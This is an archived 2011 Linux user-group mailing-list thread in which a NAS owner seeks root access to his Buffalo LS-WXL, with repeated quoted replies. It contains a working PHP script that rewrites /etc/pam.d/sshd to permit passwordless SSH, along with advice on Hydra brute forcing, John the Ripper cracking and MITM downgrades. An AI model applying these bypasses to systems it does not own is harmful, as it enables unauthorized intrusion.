Re: Is it possible to extract the root password from the file system?
On Mon, Jul 18, 2011 at 10:06 PM, Dan Dubovik dand...@gmail.com wrote: Can you SSH as the hammerhead user? No mark@orca:~/Desktop/buffalo_nas$ ssh hammerh...@xxx.xxx.xxx.xxx Password: Connection to xxx.xxx.xxx.xxx closed by remote host. Connection to xxx.xxx.xxx.xxx closed. When you FTP as the hammerhead user, can you move the script.php file to the htdocs directory? It has 777 permissions, so should be able to open it / drop a file there. Yes, I can, and it does execute. If you can get a PHP file uploaded and able to execute properly, perhaps a PHP based shell could help? I am not a php guy.I don't know how to do this. I tried a script to allow ssh without password for anyone. It seems to have written the file, however, I still cannot ssh in as root. Note: this is my first php script; the pint statements helped me debug and see if it was working. ?php echo starting...br; $filename = '/etc/pam.d/sshd'; $fh = fopen($filename, 'w+') or die(can't open file); $contents = fread($fh, 1000); echo ..file contents:br $contentsbr; $stringData = account required pam_unix.so\n; $fw = fwrite($fh, $stringData); if ($fw == false) echo ...#1 no luck writing filebr; else echo ...wrote $fw bytes: '$stringData'br; $stringData = session required pam_unix.so\n; $fw = fwrite($fh, $stringData); if ($fw == false) echo ...#2 no luck writing filebr; else echo ...wrote $fw bytes: '$stringData'br; $stringData = auth required pam_permit.so\n; $fw = fwrite($fh, $stringData); if ($fw == false) echo ...#3 no luck writing filebr; else echo ...wrote $fw bytes: '$stringData'br; rewind($fh); $contents = fread($fh, 1000); echo ...final file contents:br $contentsbr; fclose($fh); echo done!br; ? Output from the script: starting... ..file contents: ...wrote 32 bytes: 'account required pam_unix.so ' ...wrote 32 bytes: 'session required pam_unix.so ' ...wrote 28 bytes: 'auth required pam_permit.so ' ...final file contents: account required pam_unix.so session required pam_unix.so auth required pam_permit.so done! One strange behaviorwhen I re-run the script, I expected to see the contents of the file displayed after 'starting...' above, but it always comes back blank, and I still cannot login using ssh I did this: 1. restart the nas 2. run script 3. I get this ouput: mark@orca:~/Desktop/buffalo_nas$ ssh r...@xxx.xxx.xxx.xxx Connection closed by xxx.xxx.xxx.xxx 4. reset nas again 5 I get this ouput: mark@orca:~/Desktop/buffalo_nas$ ssh r...@xxx.xxx.xxx.xxx Password: Password: Password: Then all I get when I try to ssh in is Connection closed. Does anyone have any php scripts to hack this box and give me root access via ssh? Thanks! Mark -- Dan. On Mon, Jul 18, 2011 at 9:20 PM, Lisa Kachold lisakach...@obnosis.comwrote: I believe the script.php has to be moved the webroot directory and given permissions there I believe, but well if you can't get a login via ssh... -- how to do it? On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips m...@phillipsmarketing.biz wrote: On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold lisakach...@obnosis.comwrote: There are alot of password files and dictionary lists on various sites. Backtrack5 contains a good number. But I imagine that it's either not allowing root via ssh or you have the wrong username. It turns out the box is smarter than a fifth grader.after a few hydra attacks, it started rejecting all the hydra attempts to ssh in via root. Once I stopped hydra (after running all night), it took a couple of hours before it would respond to ssh attempts from root. It now will ask for the root password, but I still have no idea what it is. Or it's a truely random string. It could bethe password for the zip file to unzip the file system is YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4 . Someone retrieved it using a disassembler on the file system. I did some more reading, and one person was able to use php to allow ssh login. The box allows one to create a web space, and it comes with php installed. One can edit the php.ini file, and I can upload via ftp a php script. The script they suggested is: ?php $file = '../../../../etc/pam.d/sshd'; $fh=fopen($file, 'w') or die(can't open file); $stringData = account required pam_unix.so\n; fwrite($fh, $stringData); $stringData = session required pam_unix.so\n; fwrite($fh, $stringData); $stringData = auth required pam_permit.so\n; fwrite($fh, $stringData); fclose($fh); ? I uploaded the script, but I get a 404 File not Found when I access the page. I thought it might be a file permission error since the file is only rw. I tried chmod 777 at the ftp prompt, and got the error message File not Found, but ls shows it is there. ftp ls 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxrwxrwx 2 apache apache 6 Jul 17 08:23 cgi-bin drwxrwxrwx 2 apache apache 22 Jul 17 08:23 htdocs
Re: Is it possible to extract the root password from the file system?
I was not saying you knew the root password just that you knew a password and a corresponding hash to said password and the root hash JTR should be able to get you the correct root password. On 7/17/11, Mark Phillips m...@phillipsmarketing.biz wrote: Bryan, I think what you are missing is the ...and you know your password I don't know the root password for the NAS box. That is what I am trying to figure out so I can ssh into the box as root. What I have: * Buffalo NAS LS-WXL with firmware rev 1.43 * I can ssh as root and get a password prompt. * I can ftp into the box as a user that I created, but cannot get to the filesystem that way. * I have downloaded the firmware and unzipped it. One thought is to add a key to ssh for root and login. Reflashing the unit with firmware that does not come from the Buffalo site is not well documented, so I have put this possible solution on hold for the time being. * I just found the info about using some type of php exploit, hence my previous email. I am not a php guy, so I am a little lost on how to make it work. Does this elicit any thoughts on how to crack the root password for this box? Thanks! Mark On Sun, Jul 17, 2011 at 4:31 PM, Bryan O'Neal bryan.on...@theonealandassociates.com wrote: if you can get a copy of the password hash file. And you know your password. Then you should be able to figure out the hash function and JTR should give you every password on the box. So... I seem to be missing something in this conversation thread. ? On 7/17/11, Mark Phillips m...@phillipsmarketing.biz wrote: On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold lisakach...@obnosis.comwrote: There are alot of password files and dictionary lists on various sites. Backtrack5 contains a good number. But I imagine that it's either not allowing root via ssh or you have the wrong username. It turns out the box is smarter than a fifth grader.after a few hydra attacks, it started rejecting all the hydra attempts to ssh in via root. Once I stopped hydra (after running all night), it took a couple of hours before it would respond to ssh attempts from root. It now will ask for the root password, but I still have no idea what it is. Or it's a truely random string. It could bethe password for the zip file to unzip the file system is YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4 . Someone retrieved it using a disassembler on the file system. I did some more reading, and one person was able to use php to allow ssh login. The box allows one to create a web space, and it comes with php installed. One can edit the php.ini file, and I can upload via ftp a php script. The script they suggested is: ?php $file = '../../../../etc/pam.d/sshd'; $fh=fopen($file, 'w') or die(can't open file); $stringData = account required pam_unix.so\n; fwrite($fh, $stringData); $stringData = session required pam_unix.so\n; fwrite($fh, $stringData); $stringData = auth required pam_permit.so\n; fwrite($fh, $stringData); fclose($fh); ? I uploaded the script, but I get a 404 File not Found when I access the page. I thought it might be a file permission error since the file is only rw. I tried chmod 777 at the ftp prompt, and got the error message File not Found, but ls shows it is there. ftp ls 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxrwxrwx 2 apache apache 6 Jul 17 08:23 cgi-bin drwxrwxrwx 2 apache apache 22 Jul 17 08:23 htdocs drwxrwxrwx 2 apache apache 39 Jul 17 08:23 log -rw-rw-rw- 1 hammerhead hdusers 335 Jul 17 08:49 script.php 226 Transfer complete ftp chmod 777 script.php 550 CHMOD 777 script.php: No such file or directory ftp Is there anything I can change in the php.ini file to make this script execute? Or, am I missing something else? BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead. Thanks, Mark On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips m...@phillipsmarketing.biz wrote: Since this is a drive buffalo, I might try ettercap ssh downgrade attack: http://openmaniak.com/ettercap_filter.php ttp:// sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade Not sure how a man in the middle attack will work, since I don't know the password to begin with... Or Hydra: Hydra Instructions: http://www.youtube.com/watch?v=7CP-JB4QARo Hydra is promising. I tried it with the common passwords list from openwall. No luck. Do you have any better password lists? Thanks, Mark --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- (602) 791-8002 Android (623)
Re: Is it possible to extract the root password from the file system?
I believe the script.php has to be moved the webroot directory and given permissions there I believe, but well if you can't get a login via ssh... -- how to do it? On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips m...@phillipsmarketing.bizwrote: On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold lisakach...@obnosis.comwrote: There are alot of password files and dictionary lists on various sites. Backtrack5 contains a good number. But I imagine that it's either not allowing root via ssh or you have the wrong username. It turns out the box is smarter than a fifth grader.after a few hydra attacks, it started rejecting all the hydra attempts to ssh in via root. Once I stopped hydra (after running all night), it took a couple of hours before it would respond to ssh attempts from root. It now will ask for the root password, but I still have no idea what it is. Or it's a truely random string. It could bethe password for the zip file to unzip the file system is YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4 . Someone retrieved it using a disassembler on the file system. I did some more reading, and one person was able to use php to allow ssh login. The box allows one to create a web space, and it comes with php installed. One can edit the php.ini file, and I can upload via ftp a php script. The script they suggested is: ?php $file = '../../../../etc/pam.d/sshd'; $fh=fopen($file, 'w') or die(can't open file); $stringData = account required pam_unix.so\n; fwrite($fh, $stringData); $stringData = session required pam_unix.so\n; fwrite($fh, $stringData); $stringData = auth required pam_permit.so\n; fwrite($fh, $stringData); fclose($fh); ? I uploaded the script, but I get a 404 File not Found when I access the page. I thought it might be a file permission error since the file is only rw. I tried chmod 777 at the ftp prompt, and got the error message File not Found, but ls shows it is there. ftp ls 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxrwxrwx 2 apache apache 6 Jul 17 08:23 cgi-bin drwxrwxrwx 2 apache apache 22 Jul 17 08:23 htdocs drwxrwxrwx 2 apache apache 39 Jul 17 08:23 log -rw-rw-rw- 1 hammerhead hdusers 335 Jul 17 08:49 script.php 226 Transfer complete ftp chmod 777 script.php 550 CHMOD 777 script.php: No such file or directory ftp Is there anything I can change in the php.ini file to make this script execute? Or, am I missing something else? BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead. Thanks, Mark On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips m...@phillipsmarketing.biz wrote: Since this is a drive buffalo, I might try ettercap ssh downgrade attack: http://openmaniak.com/ettercap_filter.php ttp://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade Not sure how a man in the middle attack will work, since I don't know the password to begin with... Or Hydra: Hydra Instructions: http://www.youtube.com/watch?v=7CP-JB4QARo Hydra is promising. I tried it with the common passwords list from openwall. No luck. Do you have any better password lists? Thanks, Mark --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
Can you SSH as the hammerhead user? When you FTP as the hammerhead user, can you move the script.php file to the htdocs directory? It has 777 permissions, so should be able to open it / drop a file there. If you can get a PHP file uploaded and able to execute properly, perhaps a PHP based shell could help? -- Dan. On Mon, Jul 18, 2011 at 9:20 PM, Lisa Kachold lisakach...@obnosis.comwrote: I believe the script.php has to be moved the webroot directory and given permissions there I believe, but well if you can't get a login via ssh... -- how to do it? On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips m...@phillipsmarketing.biz wrote: On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold lisakach...@obnosis.comwrote: There are alot of password files and dictionary lists on various sites. Backtrack5 contains a good number. But I imagine that it's either not allowing root via ssh or you have the wrong username. It turns out the box is smarter than a fifth grader.after a few hydra attacks, it started rejecting all the hydra attempts to ssh in via root. Once I stopped hydra (after running all night), it took a couple of hours before it would respond to ssh attempts from root. It now will ask for the root password, but I still have no idea what it is. Or it's a truely random string. It could bethe password for the zip file to unzip the file system is YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4 . Someone retrieved it using a disassembler on the file system. I did some more reading, and one person was able to use php to allow ssh login. The box allows one to create a web space, and it comes with php installed. One can edit the php.ini file, and I can upload via ftp a php script. The script they suggested is: ?php $file = '../../../../etc/pam.d/sshd'; $fh=fopen($file, 'w') or die(can't open file); $stringData = account required pam_unix.so\n; fwrite($fh, $stringData); $stringData = session required pam_unix.so\n; fwrite($fh, $stringData); $stringData = auth required pam_permit.so\n; fwrite($fh, $stringData); fclose($fh); ? I uploaded the script, but I get a 404 File not Found when I access the page. I thought it might be a file permission error since the file is only rw. I tried chmod 777 at the ftp prompt, and got the error message File not Found, but ls shows it is there. ftp ls 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxrwxrwx 2 apache apache 6 Jul 17 08:23 cgi-bin drwxrwxrwx 2 apache apache 22 Jul 17 08:23 htdocs drwxrwxrwx 2 apache apache 39 Jul 17 08:23 log -rw-rw-rw- 1 hammerhead hdusers 335 Jul 17 08:49 script.php 226 Transfer complete ftp chmod 777 script.php 550 CHMOD 777 script.php: No such file or directory ftp Is there anything I can change in the php.ini file to make this script execute? Or, am I missing something else? BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead. Thanks, Mark On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips m...@phillipsmarketing.biz wrote: Since this is a drive buffalo, I might try ettercap ssh downgrade attack: http://openmaniak.com/ettercap_filter.php ttp://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade Not sure how a man in the middle attack will work, since I don't know the password to begin with... Or Hydra: Hydra Instructions: http://www.youtube.com/watch?v=7CP-JB4QARo Hydra is promising. I tried it with the common passwords list from openwall. No luck. Do you have any better password lists? Thanks, Mark --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
Mark, Openwall is one of the better free lists out there. BT5 has darkc0de in it (17mb). I can't think of any others that you don't have to pay for. However, you can pass rules to JTR for creating word permutations on the fly to expand your list (use the --rules option [note: default rules will increase the dictionary size about 40x]) or add entries yourself to the text file. If you have a good guess as to words the password probably contains, you could use that with the word rules to make a custom dictionary to run against it. Given how long your first dictionary attack ran, though, I would say that getting a larger dictionary (and you can get some that are several gigs) might be prohibitively time consuming. If you really want to go that route, then I'd try it with something like hashcat or other hash generator that can utilize a GPU. Even economy ATI and Nvidia cards can greatly speed the process. Just a thought, do you know if JTR is running the right hashing algorithm? The first number in the /etc/shadow file should tell you. Not too long ago I wasted a few hours waiting for JTR to crack the wrong hashed password before I realized what happened. The --format option will take care of that. This may be a silly question, but is it possible to boot the NAS in rescue mode? If that's not an option, the only other alternative I can think of would be looking for services vulnerable to privilege escalation. http://www.exploit-db.com/ might have some useful code for that. Just do a search for some of the services on the system. I hope it works out! --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
if you can get a copy of the password hash file. And you know your password. Then you should be able to figure out the hash function and JTR should give you every password on the box. So... I seem to be missing something in this conversation thread. ? On 7/17/11, Mark Phillips m...@phillipsmarketing.biz wrote: On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold lisakach...@obnosis.comwrote: There are alot of password files and dictionary lists on various sites. Backtrack5 contains a good number. But I imagine that it's either not allowing root via ssh or you have the wrong username. It turns out the box is smarter than a fifth grader.after a few hydra attacks, it started rejecting all the hydra attempts to ssh in via root. Once I stopped hydra (after running all night), it took a couple of hours before it would respond to ssh attempts from root. It now will ask for the root password, but I still have no idea what it is. Or it's a truely random string. It could bethe password for the zip file to unzip the file system is YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4 . Someone retrieved it using a disassembler on the file system. I did some more reading, and one person was able to use php to allow ssh login. The box allows one to create a web space, and it comes with php installed. One can edit the php.ini file, and I can upload via ftp a php script. The script they suggested is: ?php $file = '../../../../etc/pam.d/sshd'; $fh=fopen($file, 'w') or die(can't open file); $stringData = account required pam_unix.so\n; fwrite($fh, $stringData); $stringData = session required pam_unix.so\n; fwrite($fh, $stringData); $stringData = auth required pam_permit.so\n; fwrite($fh, $stringData); fclose($fh); ? I uploaded the script, but I get a 404 File not Found when I access the page. I thought it might be a file permission error since the file is only rw. I tried chmod 777 at the ftp prompt, and got the error message File not Found, but ls shows it is there. ftp ls 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxrwxrwx 2 apache apache 6 Jul 17 08:23 cgi-bin drwxrwxrwx 2 apache apache 22 Jul 17 08:23 htdocs drwxrwxrwx 2 apache apache 39 Jul 17 08:23 log -rw-rw-rw- 1 hammerhead hdusers 335 Jul 17 08:49 script.php 226 Transfer complete ftp chmod 777 script.php 550 CHMOD 777 script.php: No such file or directory ftp Is there anything I can change in the php.ini file to make this script execute? Or, am I missing something else? BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead. Thanks, Mark On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips m...@phillipsmarketing.biz wrote: Since this is a drive buffalo, I might try ettercap ssh downgrade attack: http://openmaniak.com/ettercap_filter.php ttp://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade Not sure how a man in the middle attack will work, since I don't know the password to begin with... Or Hydra: Hydra Instructions: http://www.youtube.com/watch?v=7CP-JB4QARo Hydra is promising. I tried it with the common passwords list from openwall. No luck. Do you have any better password lists? Thanks, Mark --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- Sent from my mobile device --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
Bryan, I think what you are missing is the ...and you know your password I don't know the root password for the NAS box. That is what I am trying to figure out so I can ssh into the box as root. What I have: * Buffalo NAS LS-WXL with firmware rev 1.43 * I can ssh as root and get a password prompt. * I can ftp into the box as a user that I created, but cannot get to the filesystem that way. * I have downloaded the firmware and unzipped it. One thought is to add a key to ssh for root and login. Reflashing the unit with firmware that does not come from the Buffalo site is not well documented, so I have put this possible solution on hold for the time being. * I just found the info about using some type of php exploit, hence my previous email. I am not a php guy, so I am a little lost on how to make it work. Does this elicit any thoughts on how to crack the root password for this box? Thanks! Mark On Sun, Jul 17, 2011 at 4:31 PM, Bryan O'Neal bryan.on...@theonealandassociates.com wrote: if you can get a copy of the password hash file. And you know your password. Then you should be able to figure out the hash function and JTR should give you every password on the box. So... I seem to be missing something in this conversation thread. ? On 7/17/11, Mark Phillips m...@phillipsmarketing.biz wrote: On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold lisakach...@obnosis.comwrote: There are alot of password files and dictionary lists on various sites. Backtrack5 contains a good number. But I imagine that it's either not allowing root via ssh or you have the wrong username. It turns out the box is smarter than a fifth grader.after a few hydra attacks, it started rejecting all the hydra attempts to ssh in via root. Once I stopped hydra (after running all night), it took a couple of hours before it would respond to ssh attempts from root. It now will ask for the root password, but I still have no idea what it is. Or it's a truely random string. It could bethe password for the zip file to unzip the file system is YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4 . Someone retrieved it using a disassembler on the file system. I did some more reading, and one person was able to use php to allow ssh login. The box allows one to create a web space, and it comes with php installed. One can edit the php.ini file, and I can upload via ftp a php script. The script they suggested is: ?php $file = '../../../../etc/pam.d/sshd'; $fh=fopen($file, 'w') or die(can't open file); $stringData = account required pam_unix.so\n; fwrite($fh, $stringData); $stringData = session required pam_unix.so\n; fwrite($fh, $stringData); $stringData = auth required pam_permit.so\n; fwrite($fh, $stringData); fclose($fh); ? I uploaded the script, but I get a 404 File not Found when I access the page. I thought it might be a file permission error since the file is only rw. I tried chmod 777 at the ftp prompt, and got the error message File not Found, but ls shows it is there. ftp ls 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxrwxrwx 2 apache apache 6 Jul 17 08:23 cgi-bin drwxrwxrwx 2 apache apache 22 Jul 17 08:23 htdocs drwxrwxrwx 2 apache apache 39 Jul 17 08:23 log -rw-rw-rw- 1 hammerhead hdusers 335 Jul 17 08:49 script.php 226 Transfer complete ftp chmod 777 script.php 550 CHMOD 777 script.php: No such file or directory ftp Is there anything I can change in the php.ini file to make this script execute? Or, am I missing something else? BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead. Thanks, Mark On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips m...@phillipsmarketing.biz wrote: Since this is a drive buffalo, I might try ettercap ssh downgrade attack: http://openmaniak.com/ettercap_filter.php ttp:// sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade Not sure how a man in the middle attack will work, since I don't know the password to begin with... Or Hydra: Hydra Instructions: http://www.youtube.com/watch?v=7CP-JB4QARo Hydra is promising. I tried it with the common passwords list from openwall. No luck. Do you have any better password lists? Thanks, Mark --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe,
Re: Is it possible to extract the root password from the file system?
There are alot of password files and dictionary lists on various sites. Backtrack5 contains a good number. But I imagine that it's either not allowing root via ssh or you have the wrong username. Or it's a truely random string. On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips m...@phillipsmarketing.bizwrote: Since this is a drive buffalo, I might try ettercap ssh downgrade attack: http://openmaniak.com/ettercap_filter.php ttp://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade Not sure how a man in the middle attack will work, since I don't know the password to begin with... Or Hydra: Hydra Instructions: http://www.youtube.com/watch?v=7CP-JB4QARo Hydra is promising. I tried it with the common passwords list from openwall. No luck. Do you have any better password lists? Thanks, Mark --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
Mark, On Thu, Jul 14, 2011 at 6:56 PM, Mark Phillips m...@phillipsmarketing.bizwrote: Lisa, John the Ripper has been running for almost 2 days trying to crack the passwordstill no success. I think it's hung. What options did you pass it? Did you feed it a dictionary file? It probably has a different encryption format than the linux john is on. What ports are open on the thing? SSH? You can try ettercap with arp spoof MITM? :) Mark On Jul 14, 2011 4:28 PM, Lisa Kachold lisakach...@obnosis.com wrote: If you don't have the ability to boot something like a DVD/CD or USB key, try john the ripper? Save the encrypted string to a test file and run it through john the ripper running on your system: Ubuntu: # apt-get install john Centos/RH/Fedora: # yum install john Example use: # john -single crackme.txt References: http://www.openwall.com/john/doc/ http://www.google.com/url?sa=tsource=videocd=1ved=0CDIQtwIwAAurl=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D3YyscD_tADkrct=jq=john%20the%20rippertbm=videi=t3ofTsXRNqTv0gHB2bmYAwusg=AFQjCNE8vdlkxhwQ15zCuBePI9Y9qk3mAQcad=rja http://www.osix.net/modules/article/?id=455 On Thu, Jul 14, 2011 at 11:19 AM, Sam Kreimeyer skrei...@gmail.com wrote: Hello Mark, Have you tried using Kon-Boot? It's a bootable image that edits the kernel to bypass the password prompt. -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
On Fri, Jul 15, 2011 at 7:27 PM, Lisa Kachold lisakach...@obnosis.comwrote: Mark, On Thu, Jul 14, 2011 at 6:56 PM, Mark Phillips m...@phillipsmarketing.biz wrote: Lisa, John the Ripper has been running for almost 2 days trying to crack the passwordstill no success. I think it's hung. Nope. the log file keeps spitting out what it is testing. I stopped it today and moved the process to another machine. You can see the results as reported in the log file at http://pastebin.com/pBZHfAS2 when I stopped the program . The other machine is slower (about 1.85 times slower, so it will take until Monday for it to catch upthe original machine was a x64, and the new machine is an i386, so I couldn't resume on the new machine). I will let you know if it finds the password after a week or two;-) What options did you pass it? None. Except that I used another program that came with john to join the passwd and shadow files into one file. John needed that. I can send you the passwd file if you are interested. Did you feed it a dictionary file? Just the one that came with john... It probably has a different encryption format than the linux john is on. What ports are open on the thing? SSH? You can try ettercap with arp spoof MITM? SSH seems to be open since it asks for a password. rsync and telnet are all that I know. There is a java hack program acp_commander.jar that will connect with telnet, but I do not get any response from the device, although it says it is connected. acp-commander.jar use to be the way in, but since firmware version 1.41, it has not worked. http://downloads.buffalo.nas-central.org/TOOLS/ALL_LS_KB_ARM9/ACP_COMMANDER/, http://buffalo.nas-central.org/index.php/Open_Stock_Firmware and my particular box. I have downloaded the firmware for the box and modified it to accept ssh login without a password (using ssh keys). I just have not been able to reflash the unit. The web interface only flashes what it downloads from buffalo.com. The windows program the box came with does not have a way to flash the unit. Embedded in the firmware download is a windows exe which is supposed to be a program to flash the unitjust haven't had the intestinal fortitude to try it out...I need to find the way back in case I brick the device, and I haven't had time to research that. Thanks for your interest! P.S. You have no idea how hard it is to not type dear john every time I refer to the program john the ripper.;-) anyway, back to TGIF time;-) Mark :) Mark On Jul 14, 2011 4:28 PM, Lisa Kachold lisakach...@obnosis.com wrote: If you don't have the ability to boot something like a DVD/CD or USB key, try john the ripper? Save the encrypted string to a test file and run it through john the ripper running on your system: Ubuntu: # apt-get install john Centos/RH/Fedora: # yum install john Example use: # john -single crackme.txt References: http://www.openwall.com/john/doc/ http://www.google.com/url?sa=tsource=videocd=1ved=0CDIQtwIwAAurl=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D3YyscD_tADkrct=jq=john%20the%20rippertbm=videi=t3ofTsXRNqTv0gHB2bmYAwusg=AFQjCNE8vdlkxhwQ15zCuBePI9Y9qk3mAQcad=rja http://www.osix.net/modules/article/?id=455 On Thu, Jul 14, 2011 at 11:19 AM, Sam Kreimeyer skrei...@gmail.com wrote: Hello Mark, Have you tried using Kon-Boot? It's a bootable image that edits the kernel to bypass the password prompt. -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
